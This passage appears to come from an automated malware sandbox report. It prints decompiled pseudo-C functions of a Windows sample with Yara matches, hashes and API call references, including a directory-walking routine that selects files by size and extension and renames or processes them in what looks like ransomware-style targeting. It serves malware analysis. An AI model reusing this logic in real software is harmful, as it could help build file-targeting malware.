                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: NameUser
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                                                              • Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                                                                                                              • Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
                                                                                                                                                                                              • Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00403604, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00403604(char* __eax, short* __ecx, int __edx, int _a4) {
				int _t4;
				int _t5;

				_t4 =  *0x41c5a8; // 0x3
				_t5 = WideCharToMultiByte(_t4, 0, __ecx, _a4, __eax, __edx, 0, 0); // executed
				return _t5;
			}





                                                                                                                                                                                              0x00403614
                                                                                                                                                                                              0x0040361a
                                                                                                                                                                                              0x00403620

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 626452242-0
                                                                                                                                                                                              • Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                                                                                                              • Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00401464, Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00401464(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x41c5d4; // 0x41c5d4
				while(_t35 != 0x41c5d4) {
					_t42 =  *_t35;
					_t5 = _t35 + 8; // 0x0
					_t43 =  *_t5;
					if(_t44 <= _t43) {
						_t6 = _t35 + 0xc; // 0x0
						if(_t43 +  *_t6 <= _v20) {
							if(_t43 < _v28) {
								_v28 = _t43;
							}
							_t10 = _t35 + 0xc; // 0x0
							_t31 = _t43 +  *_t10;
							if(_t31 > _v24) {
								_v24 = _t31;
							}
							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
							if(_t32 == 0) {
								 *0x41c5b0 = 1;
							}
							E0040126C(_t35);
						}
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 == 0) {
					return _t24;
				}
				 *_v32 = _v28;
				_t27 = _v24 - _v28;
				 *((intOrPtr*)(_v32 + 4)) = _t27;
				return _t27;
			}
















                                                                                                                                                                                              0x00401468
                                                                                                                                                                                              0x0040146b
                                                                                                                                                                                              0x0040146f
                                                                                                                                                                                              0x00401472
                                                                                                                                                                                              0x0040147c
                                                                                                                                                                                              0x00401480
                                                                                                                                                                                              0x00401487
                                                                                                                                                                                              0x0040148b
                                                                                                                                                                                              0x004014e4
                                                                                                                                                                                              0x00401493
                                                                                                                                                                                              0x00401495
                                                                                                                                                                                              0x00401495
                                                                                                                                                                                              0x0040149a
                                                                                                                                                                                              0x0040149e
                                                                                                                                                                                              0x004014a5
                                                                                                                                                                                              0x004014ab
                                                                                                                                                                                              0x004014ad
                                                                                                                                                                                              0x004014ad
                                                                                                                                                                                              0x004014b3
                                                                                                                                                                                              0x004014b3
                                                                                                                                                                                              0x004014ba
                                                                                                                                                                                              0x004014bc
                                                                                                                                                                                              0x004014bc
                                                                                                                                                                                              0x004014c8
                                                                                                                                                                                              0x004014cf
                                                                                                                                                                                              0x004014d1
                                                                                                                                                                                              0x004014d1
                                                                                                                                                                                              0x004014dd
                                                                                                                                                                                              0x004014dd
                                                                                                                                                                                              0x004014a5
                                                                                                                                                                                              0x004014e2
                                                                                                                                                                                              0x004014e2
                                                                                                                                                                                              0x004014ec
                                                                                                                                                                                              0x004014f2
                                                                                                                                                                                              0x004014f9
                                                                                                                                                                                              0x0040151b
                                                                                                                                                                                              0x0040151b
                                                                                                                                                                                              0x00401503
                                                                                                                                                                                              0x00401509
                                                                                                                                                                                              0x00401511
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                              • Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                              • Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040151C, Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0040151C(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x41c5d4; // 0x41c5d4
				while(_t29 != 0x41c5d4) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                                                                                              0x00401523
                                                                                                                                                                                              0x00401527
                                                                                                                                                                                              0x0040152e
                                                                                                                                                                                              0x00401543
                                                                                                                                                                                              0x0040154b
                                                                                                                                                                                              0x00401551
                                                                                                                                                                                              0x00401557
                                                                                                                                                                                              0x0040155a
                                                                                                                                                                                              0x0040159e
                                                                                                                                                                                              0x00401562
                                                                                                                                                                                              0x00401562
                                                                                                                                                                                              0x00401565
                                                                                                                                                                                              0x00401568
                                                                                                                                                                                              0x0040156c
                                                                                                                                                                                              0x0040156e
                                                                                                                                                                                              0x0040156e
                                                                                                                                                                                              0x00401574
                                                                                                                                                                                              0x00401576
                                                                                                                                                                                              0x00401576
                                                                                                                                                                                              0x0040157c
                                                                                                                                                                                              0x00401589
                                                                                                                                                                                              0x00401590
                                                                                                                                                                                              0x00401592
                                                                                                                                                                                              0x00401598
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00401598
                                                                                                                                                                                              0x00401590
                                                                                                                                                                                              0x0040159c
                                                                                                                                                                                              0x0040159c
                                                                                                                                                                                              0x004015ad

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00401589
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                              • Opcode ID: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                              • Instruction ID: d2e5847c23a0d0fb2b7a3dff60909d67c0489ed435542f313e0fa7b23e2e95f5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 87944e6d7ec2424c7827a654054cf40cbadd8ec593a4801b2f8f16170b9bc70d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 67115E72A44701AFC3109E29CC80A6BBBE2EBC4750F15C539E5996B3A5D734AC408B89
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 004015B0, Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                              			E004015B0(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x41c5d4; // 0x41c5d4
				while(_t19 != 0x41c5d4) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x41c5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                                                                                                                                              0x004015b4
                                                                                                                                                                                              0x004015c5
                                                                                                                                                                                              0x004015cc
                                                                                                                                                                                              0x004015d5
                                                                                                                                                                                              0x004015d9
                                                                                                                                                                                              0x004015dc
                                                                                                                                                                                              0x004015df
                                                                                                                                                                                              0x0040161f
                                                                                                                                                                                              0x004015e7
                                                                                                                                                                                              0x004015e7
                                                                                                                                                                                              0x004015ea
                                                                                                                                                                                              0x004015ed
                                                                                                                                                                                              0x004015f2
                                                                                                                                                                                              0x004015f4
                                                                                                                                                                                              0x004015f4
                                                                                                                                                                                              0x004015f9
                                                                                                                                                                                              0x004015fb
                                                                                                                                                                                              0x004015fb
                                                                                                                                                                                              0x004015ff
                                                                                                                                                                                              0x0040160a
                                                                                                                                                                                              0x00401611
                                                                                                                                                                                              0x00401613
                                                                                                                                                                                              0x00401613
                                                                                                                                                                                              0x00401611
                                                                                                                                                                                              0x0040161d
                                                                                                                                                                                              0x0040161d
                                                                                                                                                                                              0x0040162c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                              • Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                                                                                                              • Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
                                                                                                                                                                                              • Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 00414408, Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E00414408(char __eax, int __ebx, void* __ecx, char __edx, void* __edi, signed int __esi, char _a4, char _a8, char _a12, intOrPtr _a16, char _a20) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v53;
				intOrPtr _v56;
				struct _WIN32_FIND_DATAW _v648;
				char _v652;
				char _v656;
				char _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				char _v704;
				char _v708;
				char _v712;
				char _v716;
				char _v720;
				char _v724;
				char _v728;
				char _v732;
				char _v736;
				char _v740;
				char _v744;
				intOrPtr _v748;
				char _v752;
				char _v756;
				char _v760;
				char _v764;
				char _v768;
				char _v772;
				char _v776;
				char _v780;
				char _v784;
				char _v788;
				char _v792;
				void* _t239;
				void* _t295;
				intOrPtr* _t299;
				void* _t301;
				int _t312;
				int _t333;
				signed int _t343;
				long _t349;
				int _t354;
				int _t377;
				int _t383;
				void* _t387;
				intOrPtr* _t425;
				intOrPtr _t428;
				intOrPtr* _t456;
				int _t460;
				intOrPtr _t464;
				intOrPtr* _t471;
				intOrPtr _t486;
				intOrPtr _t496;
				intOrPtr _t497;
				intOrPtr _t499;
				void* _t534;
				void* _t556;
				void* _t570;
				void* _t573;
				signed int _t575;
				intOrPtr _t577;
				intOrPtr _t578;
				intOrPtr* _t579;

				_t574 = __esi;
				_t458 = __ebx;
				_t577 = _t578;
				_push(__ecx);
				_t464 = 0x62;
				do {
					_push(0);
					_push(0);
					_t464 = _t464 - 1;
					_t580 = _t464;
				} while (_t464 != 0);
				_t1 =  &_v8;
				 *_t1 = _t464;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				E004040F4( &_a20);
				_push(_t577);
				_push(0x414c0d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t578;
				_v20 = 0;
				E004062D8(_v8,  &_v652, _t580);
				E00403BE0( &_v8, _v652);
				E0040377C( &_v656, _a20);
				E0040795C(0x414c2c,  &_v52, _v656, _t580);
				E0040377C( &_v660, _v12);
				E0040795C(0x414c38,  &_v44, _v660, _t580);
				_t239 = E004045EC(_v44);
				_t581 = _t239;
				if(_t239 == 0) {
					L46:
					_pop(_t486);
					 *[fs:eax] = _t486;
					_push(E00414C17);
					E00403B98( &_v792, 2);
					E00403508( &_v784, 2);
					E00403B80( &_v776);
					E00403508( &_v772, 2);
					E00403B98( &_v764, 6);
					E004034E4( &_v740);
					E00403B98( &_v736, 5);
					E00403508( &_v716, 3);
					E00403B98( &_v704, 3);
					E004034E4( &_v692);
					E00403B80( &_v688);
					E004034E4( &_v684);
					E00403B98( &_v680, 5);
					E00403508( &_v660, 2);
					E00403B80( &_v652);
					_t496 =  *0x405f2c; // 0x405f30
					E004047B4( &_v52, _t496);
					E00403B80( &_v48);
					_t497 =  *0x405f2c; // 0x405f30
					E004047B4( &_v44, _t497);
					E00403B98( &_v40, 4);
					_t499 =  *0x4143e4; // 0x4143e8
					E004047B4( &_v24, _t499);
					E00403B98( &_v16, 3);
					_t214 =  &_a20; // 0x414c4c
					return E00403B80(_t214);
				} else {
					_push(E004045EC(_v24) + 1);
					E004047A8();
					_t579 = _t578 + 4;
					_push(_v24 + E004045EC(_v24) * 4 - 4);
					E0040781C(_v8, __ebx,  &_v664, _t581);
					_pop(_t295);
					E00403BBC(_t295, _v664);
					while(E004045EC(_v24) > 0) {
						_t299 =  *0x41b594; // 0x41c828
						_t34 = _t299 + 4; // 0x0
						_t301 =  *_t299 - 0x4b000;
						asm("sbb edx, 0x0");
						_t471 =  *0x41b63c; // 0x41c820
						_t35 = _t471 + 4; // 0x0
						__eflags =  *_t34 -  *_t35;
						if(__eflags != 0) {
							if(__eflags <= 0) {
								goto L46;
							}
							L8:
							E0040781C( *((intOrPtr*)(_v24 + E004045EC(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
							E00403B80(_v24 + E004045EC(_v24) * 4 - 4);
							_t312 = E004045EC(_v24) - 1;
							__eflags = _t312;
							_push(_t312);
							E004047A8();
							_t579 = _t579 + 4;
							E00403DB8( &_v672, 0x414c40, _v28, __eflags);
							E0040781C(_v672, _t458,  &_v668, __eflags);
							_t573 = FindFirstFileW(E00403D3C(_v668),  &_v648);
							do {
								_push(_v28);
								_push(0x414c4c);
								_t474 = 0x104;
								E00403D10( &_v680, 0x104,  &(_v648.cFileName));
								_push(_v680);
								E00403E1C();
								E0040781C(_v676, _t458,  &_v32, __eflags);
								E0040770C(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
									L21:
									__eflags = _a8 - 1;
									if(_a8 != 1) {
										L30:
										__eflags = _a12 - 1;
										if(_a12 != 1) {
											goto L43;
										}
										E00403D10( &_v756, 0x104,  &(_v648.cFileName));
										E00403E64(_v756, 0x414c70);
										if(__eflags == 0) {
											goto L43;
										}
										E00403D10( &_v760, 0x104,  &(_v648.cFileName));
										E00403E64(_v760, 0x414c7c);
										if(__eflags == 0) {
											goto L43;
										}
										_t343 = _v648.dwFileAttributes;
										__eflags = (_t343 & 0x00000010) - 0x10;
										if((_t343 & 0x00000010) != 0x10) {
											goto L43;
										}
										__eflags = (_t343 & 0x00000400) - 0x400;
										if(__eflags == 0) {
											goto L43;
										}
										E0040781C(_v32, _t458,  &_v764, __eflags);
										_t349 = GetFileAttributesW(E00403D3C(_v764));
										__eflags = _t349 - 0xffffffff;
										if(_t349 == 0xffffffff) {
											goto L43;
										}
										_v53 = 0;
										_t458 = E004045EC(_v52) - 1;
										__eflags = _t458;
										if(_t458 < 0) {
											L41:
											__eflags = _v53;
											if(_v53 == 0) {
												_t354 = E004045EC(_v24) + 1;
												__eflags = _t354;
												_push(_t354);
												E004047A8();
												_t579 = _t579 + 4;
												E00403BBC(_v24 + E004045EC(_v24) * 4 - 4, _v32);
											}
											goto L43;
										}
										_t460 = _t458 + 1;
										_t575 = 0;
										__eflags = 0;
										do {
											E0040781C(_v32, _t460,  &_v776, __eflags);
											E0040377C( &_v772, _v776);
											E00406318(_v772, _t460,  &_v768, _t573, _t575);
											_push(_v768);
											E00403D2C( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
											E0040781C(_v792, _t460,  &_v788, __eflags);
											E0040377C( &_v784, _v788);
											E00406318(_v784, _t460,  &_v780, _t573, _t575);
											_pop(_t534);
											_t377 = E00403A78(_v780, _t534);
											__eflags = _t377;
											if(_t377 != 0) {
												_v53 = 1;
											}
											_t575 = _t575 + 1;
											_t460 = _t460 - 1;
											__eflags = _t460;
										} while (__eflags != 0);
										goto L41;
									}
									E0040377C( &_v712, _v36);
									E00406318(_v712, _t458,  &_v708, _t573, _t574);
									_t383 = E00403A78(0x414c58, _v708);
									__eflags = _t383;
									if(_t383 == 0) {
										goto L30;
									}
									E004141B8(_v32, _t458,  &_v40, _t574);
									_t387 = E004068EC(_v40);
									__eflags = _t387 - _a16;
									if(_t387 > _a16) {
										goto L30;
									}
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L30;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040770C(_v40, _t458, _t474,  &_v720, _t574, __eflags);
										E0040377C( &_v716, _v720);
										_t474 = 0;
										__eflags = E00406120(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(__eflags != 0) {
											continue;
										}
										goto L30;
									}
									E0040781C(_v32, _t458,  &_v724, __eflags);
									E00403BE0( &_v32, _v724);
									E0040781C(_v8, _t458,  &_v728, __eflags);
									E00403BE0( &_v8, _v728);
									E0040781C(_v40, _t458,  &_v732, __eflags);
									E00403BE0( &_v40, _v732);
									_push(_v32);
									_push("._.");
									E0040770C(_v40, _t458, 0,  &_v736, _t574, __eflags);
									_push(_v736);
									E00403E1C();
									E00403F34( &_v48, E00403D4C(_v8), 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v748, _t458,  &_v744, __eflags);
									E0040377C( &_v740, _v744);
									_push(_v740);
									E0040781C(_v40, _t458,  &_v752, __eflags);
									_pop(_t556);
									E0040DDB0(_v752, _t458, _t556, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t425 =  *0x41b638; // 0x41b0ac
										 *_t425 =  *_t425 + 1;
									}
									goto L30;
								}
								__eflags = _v648.nFileSizeHigh;
								if(_v648.nFileSizeHigh != 0) {
									goto L21;
								}
								_push(0);
								_push(_v648.nFileSizeLow >> 0xa);
								_t428 = _a16;
								asm("cdq");
								__eflags = 0 - _v56;
								if(__eflags != 0) {
									if(__eflags < 0) {
										goto L21;
									}
									L15:
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L21;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040377C( &_v684, _v36);
										_t474 = 0;
										__eflags = E00406120(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(_t458 != 0) {
											continue;
										}
										goto L21;
									}
									E0040781C(_v8, _t458,  &_v688, __eflags);
									E00403BE0( &_v8, _v688);
									E0040781C(_v32, _t458,  &_v48, __eflags);
									_t474 = E00403D4C(_v8);
									E00403F34( &_v48, _t443, 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v700, _t458,  &_v696, __eflags);
									E0040377C( &_v692, _v696);
									_push(_v692);
									E0040781C(_v32, _t458,  &_v704, __eflags);
									_pop(_t570);
									E0040DDB0(_v704, _t458, _t570, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t456 =  *0x41b638; // 0x41b0ac
										 *_t456 =  *_t456 + 1;
									}
									goto L21;
								}
								__eflags = _t428 -  *_t579;
								if(_t428 <  *_t579) {
									goto L21;
								}
								goto L15;
								L43:
								_t333 = FindNextFileW(_t573,  &_v648);
								__eflags = _t333;
							} while (_t333 != 0);
							FindClose(_t573);
							continue;
						}
						__eflags = _t301 -  *_t471;
						if(_t301 >  *_t471) {
							goto L8;
						} else {
							goto L46;
						}
					}
					goto L46;
				}
			}




















































































                                                                                                                                                                                              0x00414408
                                                                                                                                                                                              0x00414408
                                                                                                                                                                                              0x00414409
                                                                                                                                                                                              0x0041440b
                                                                                                                                                                                              0x0041440c
                                                                                                                                                                                              0x00414411
                                                                                                                                                                                              0x00414411
                                                                                                                                                                                              0x00414413
                                                                                                                                                                                              0x00414415
                                                                                                                                                                                              0x00414415
                                                                                                                                                                                              0x00414415
                                                                                                                                                                                              0x00414418
                                                                                                                                                                                              0x00414418
                                                                                                                                                                                              0x0041441b
                                                                                                                                                                                              0x0041441c
                                                                                                                                                                                              0x0041441d
                                                                                                                                                                                              0x0041441e
                                                                                                                                                                                              0x00414421
                                                                                                                                                                                              0x00414424
                                                                                                                                                                                              0x0041442a
                                                                                                                                                                                              0x00414432
                                                                                                                                                                                              0x0041443a
                                                                                                                                                                                              0x00414442
                                                                                                                                                                                              0x00414449
                                                                                                                                                                                              0x0041444a
                                                                                                                                                                                              0x0041444f
                                                                                                                                                                                              0x00414452
                                                                                                                                                                                              0x00414457
                                                                                                                                                                                              0x00414463
                                                                                                                                                                                              0x00414471
                                                                                                                                                                                              0x0041447f
                                                                                                                                                                                              0x00414492
                                                                                                                                                                                              0x004144a0
                                                                                                                                                                                              0x004144b3
                                                                                                                                                                                              0x004144bb
                                                                                                                                                                                              0x004144c0
                                                                                                                                                                                              0x004144c2
                                                                                                                                                                                              0x00414ad9
                                                                                                                                                                                              0x00414adb
                                                                                                                                                                                              0x00414ade
                                                                                                                                                                                              0x00414ae1
                                                                                                                                                                                              0x00414af1
                                                                                                                                                                                              0x00414b01
                                                                                                                                                                                              0x00414b0c
                                                                                                                                                                                              0x00414b1c
                                                                                                                                                                                              0x00414b2c
                                                                                                                                                                                              0x00414b37
                                                                                                                                                                                              0x00414b47
                                                                                                                                                                                              0x00414b57
                                                                                                                                                                                              0x00414b67
                                                                                                                                                                                              0x00414b72
                                                                                                                                                                                              0x00414b7d
                                                                                                                                                                                              0x00414b88
                                                                                                                                                                                              0x00414b98
                                                                                                                                                                                              0x00414ba8
                                                                                                                                                                                              0x00414bb3
                                                                                                                                                                                              0x00414bbb
                                                                                                                                                                                              0x00414bc1
                                                                                                                                                                                              0x00414bc9
                                                                                                                                                                                              0x00414bd1
                                                                                                                                                                                              0x00414bd7
                                                                                                                                                                                              0x00414be4
                                                                                                                                                                                              0x00414bec
                                                                                                                                                                                              0x00414bf2
                                                                                                                                                                                              0x00414bff
                                                                                                                                                                                              0x00414c04
                                                                                                                                                                                              0x00414c0c
                                                                                                                                                                                              0x004144c8
                                                                                                                                                                                              0x004144d1
                                                                                                                                                                                              0x004144e0
                                                                                                                                                                                              0x004144e5
                                                                                                                                                                                              0x004144f7
                                                                                                                                                                                              0x00414501
                                                                                                                                                                                              0x0041450c
                                                                                                                                                                                              0x0041450d
                                                                                                                                                                                              0x00414ac9
                                                                                                                                                                                              0x00414517
                                                                                                                                                                                              0x0041451c
                                                                                                                                                                                              0x00414521
                                                                                                                                                                                              0x00414526
                                                                                                                                                                                              0x00414529
                                                                                                                                                                                              0x0041452f
                                                                                                                                                                                              0x0041452f
                                                                                                                                                                                              0x00414532
                                                                                                                                                                                              0x0041453d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00414543
                                                                                                                                                                                              0x00414555
                                                                                                                                                                                              0x00414569
                                                                                                                                                                                              0x00414576
                                                                                                                                                                                              0x00414576
                                                                                                                                                                                              0x00414577
                                                                                                                                                                                              0x00414586
                                                                                                                                                                                              0x0041458b
                                                                                                                                                                                              0x004145a3
                                                                                                                                                                                              0x004145b4
                                                                                                                                                                                              0x004145ca
                                                                                                                                                                                              0x004145cc
                                                                                                                                                                                              0x004145cc
                                                                                                                                                                                              0x004145cf
                                                                                                                                                                                              0x004145e0
                                                                                                                                                                                              0x004145e5
                                                                                                                                                                                              0x004145ea
                                                                                                                                                                                              0x004145fb
                                                                                                                                                                                              0x00414609
                                                                                                                                                                                              0x00414614
                                                                                                                                                                                              0x00414622
                                                                                                                                                                                              0x00414625
                                                                                                                                                                                              0x00414759
                                                                                                                                                                                              0x00414759
                                                                                                                                                                                              0x0041475d
                                                                                                                                                                                              0x00414912
                                                                                                                                                                                              0x00414912
                                                                                                                                                                                              0x00414916
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0041492d
